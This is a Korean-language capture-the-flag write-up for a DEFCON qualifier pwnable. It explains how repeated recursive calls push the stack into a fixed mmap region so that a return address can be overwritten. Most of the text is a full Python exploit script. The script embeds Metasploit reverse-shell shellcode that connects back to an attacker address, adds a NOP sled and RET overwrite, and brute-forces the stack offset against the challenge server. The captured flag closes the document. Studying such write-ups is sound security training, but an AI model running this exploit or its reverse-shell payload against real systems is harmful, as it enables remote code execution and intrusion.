이 문제의 핵심 포인트는 다음과 같습니다.

1) recursive call operation

2) mmap() operation
고정된 주소 0xbfbdf000 에 mmap() 을 통해 0x1000 size 만큼 잡은 뒤 recv한 내용을 0x1000 만큼 
기록함

하지만 여기서 고정된 주소 0xbfbdf000이 stack esp 에 비하여 그리 높지 않은 곳에 있다는 것을 
알 수 있고 또한 recursive call을 통해 계속해서 stack을 쌓아가다보면 (한 번에 0x500 정도)
어느 순간 stack esp 값과 mmap의 base가 겹쳐진다는 것을 짐작할 수 있습니다.

이를 통해 RET 값을 덮어 씌울 수 있습니다. exploit은 다음과 같습니다.

===========================================================================
$ cat pw400.py
#! /usr/local/bin/python
import struct
import socket
import time

host = "quals07.allyourboxarebelongto.us"
port = 4455

# scode 는 reverse shell 로 작성되었으며 현재 192.168.0.2로 connect back 하게 되어있음
#/* bsdi_ia32_reverse -  LHOST=192.168.0.2 LPORT=5555 Size=104 Encoder=PexFnstenvSub http://metasploit.com */
scode = "\x33\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3e"
scode += "\xe2\xa7\xc7\x83\xeb\xfc\xe2\xf4\xb7\x07\xcf\xc7\x39\xe2\x64\x7f"
scode += "\xa4\xe2\xa7\xc7\xa7\xb2\x2e\x21\x6c\xa0\xf5\x85\x6c\x88\xc6\x9f"
scode += "\xc1\x34\x30\xaf\xfe\x4a\xa7\xc5\x56\xf2\xa5\xd2\x8d\x6b\x44\xad"
scode += "\x2e\xb1\xf0\xad\x5c\xba\x58\x11\x8e\xb8\xf5\x90\xc1\x34\xed\xbe"
scode += "\xc9\xb2\xcf\xe8\x11\x91\xcf\xaf\x11\x80\xce\xa9\xb7\x01\xf7\x93"
scode += "\x6d\x52\x9c\x38\xe8\xe2\xa7\xc7"

MAP_BASE = 0xbfbdf000 # mmap base 주소

##########################################################3
def attack(num):
    sfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sfd.connect( (host, port))
    sfd.settimeout(1)

    ########################################
    # Recursive operation 을 위한 stub buffer
    bufRec1 = struct.pack("<I", 0x3) + "aaaa" # operation number 4 bytes + dummy 4 bytes
    bufRec2 = struct.pack("<I", 0x10)  # number of recursive call

    ########################################
    # mmap operation 을 위한 stub buffer
    bufMmap1 = struct.pack("<I", 0x7) + struct.pack("<I", 0x1000) # operation number 7 + size of buffer length to do mmap

    bufMmap2 = ""
    for i in range( 6):
        bufMmap2 += struct.pack("<I", MAP_BASE +0x600 ) * (0x100/4) # overwrite RET

    bufMmap2 += "\x90" * 0x200 # NOP
    bufMmap2 += scode   # Shell code
    bufMmap2 += "\x90" * (0x1000 - len(bufMmap2)) # dummy NOP

    #time.sleep(10) # 디버깅 시 comment out 할 것


    ########################################
    # Recursive call 을 통해 0x500 * 70 정도의 스택을 미리 잡아먹음
    for i in range(0, 70):
        nBytes = sfd.send(bufRec1)
        nBytes = sfd.send(bufRec2)

    ########################################
    # 주어진 num에 맞게 mmap operation을 실행
    for i in range(0, 200):
        # RECURSIVE
        nBytes = sfd.send(bufRec1)
        nBytes = sfd.send(bufRec2)

        # num 보다 작을경우엔 mmap operation을 하지 않는다.
        if i <= num:
            continue

        # MMAP call !!
        nBytes = sfd.send(bufMmap1)
        nBytes = sfd.send(bufMmap2)
        try:
            output = sfd.recv(10)
            print "recv : [%s]" % output
        except:
            print "END"
            sfd.close()
            return

        # RECURSIVE
        nBytes = sfd.send(bufRec1)
        nBytes = sfd.send(bufRec2)

    sfd.close()


##########################################################3
if __name__ == "__main__":
# 한번의 recursive 콜로 stack을 0x500정도 만큼 잡아 먹음
# 정확한 stack base를 알수없으므로 brute force
    for num in range(21, 50):
        print "======================="
        print "num : %d" % num
        print "======================="
        try:
            attack(num)
        except:
            pass

===========================================================================


Potent Pwnables400 key:  luwenth got some last night